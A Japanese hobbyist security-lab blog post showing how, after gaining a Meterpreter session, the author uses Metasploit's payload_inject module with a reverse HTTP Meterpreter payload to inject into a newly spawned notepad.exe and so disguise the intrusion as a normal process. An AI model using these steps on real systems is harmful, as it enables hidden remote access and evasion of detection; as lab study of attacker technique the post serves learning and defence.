ウサギは後退せず、大きな耳で情報集めをする事に験を担ぎ、古来より日本では鎧などにウサギの図柄を取り入れてきたらしい。
読者です 読者をやめる 読者になる 読者になる

うさブロ

ぼっちなうさぎのセキュリティラボ

とある親父の侵入実験【潜伏(インジェクション)】

f:id:appleseedj073:20160813022549p:plain

上手く侵入できても、不審なプロセスとして止められてしまっては意味がないので、別なプロセスとして偽装し潜伏させるのが御作法らしい。

 

まずはmeterpreterでsessionの確認

f:id:appleseedj073:20160816135429p:plain

最初に作成されたセッションが確認できる。

 

f:id:appleseedj073:20160816135641p:plain

 msf > use exploit/windows/local/payload_inject 

 msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_htt

次にインジェクションを行うexploitを指定して必要なPYALOAD、パラメータを指定する。途中の入力項目「NEWPROCESS true」は、新規にnotepadのプロセスを立ち上げてそれにインジェクションすることになる。falseにした場合は、インジェクションするPIDを指定する。

 

f:id:appleseedj073:20160816135844p:plain

入力内容を確認したらexploitする。成功すると、指定したポートに対して新しいセッションが作成される。

 

f:id:appleseedj073:20160816140225p:plain

ちゃんと対象の端末に侵入できている事が確認できる。

 

f:id:appleseedj073:20160816135356p:plain

セッションが増えているのも確認できる。

ここまでの手順で、notepad.exeのプロセスを起動してインジェクションして新たなセッションを作成したことになる。これで、見た目はnotepadのプロセスという一般的な攻撃手法の完成になる。